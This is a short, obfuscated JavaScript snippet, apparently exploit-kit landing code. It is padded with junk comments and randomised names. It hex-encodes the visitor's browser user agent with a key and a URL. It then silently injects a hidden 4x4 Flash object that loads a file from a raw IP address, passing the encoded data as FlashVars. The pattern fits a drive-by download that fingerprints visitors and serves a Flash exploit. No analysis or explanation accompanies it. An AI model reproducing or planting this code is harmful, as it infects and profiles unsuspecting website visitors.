/*s94434d51631hssfj13207fs*/function hgfgerdfgdf(num, width){/*s26818d77119hfj84958fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s87502d62985hfj18859fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s23829d38280hfj45930fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s67592d67205hfj35938fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd6324hfs*/c += b + d;/*s17717d18777hfj8340fs*/e += 1;}return c;}/*s8344dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.74.166/?NzM1MDMzMTQ=&info=NTA3NzQyNA==&elsa=imo9VW1gQ9auv3EPczxSUhJXUrxTeNAtN_5CdRbAz3l-hmrNHeMojxxSA7GNXmegtV1gV6Qgbm6_7VaCO-w&rand=xH_QMrPYbR3FFYPfKPnEUKdEMU3WA0eKwYyZhazVF5-xFDfGpbL1FxzspVydCFyEmvJvdLAHIwGh1UTASwd&fore=MTI5NDExNTI=", ghnvbn("http://188.225.74.166/?OTA4MjAxNjQ=&elsa=DnjE2JeAdjndxfW1wb9q343ECGnB6dgJ_T_x2LNQgQrJqUELE52VjymrAkd8omxRSH6FENjOge&rand=xX_QMvWebRXQC53EKvncT6NEMVHRHECL2Y-dmrHTefjaelWkzrLFTF_xozKASASG6_FtdfJRDQ&info=MzI5NzAxMjI=&reinz=MTE5MDE1MTM=","aexykukusa"));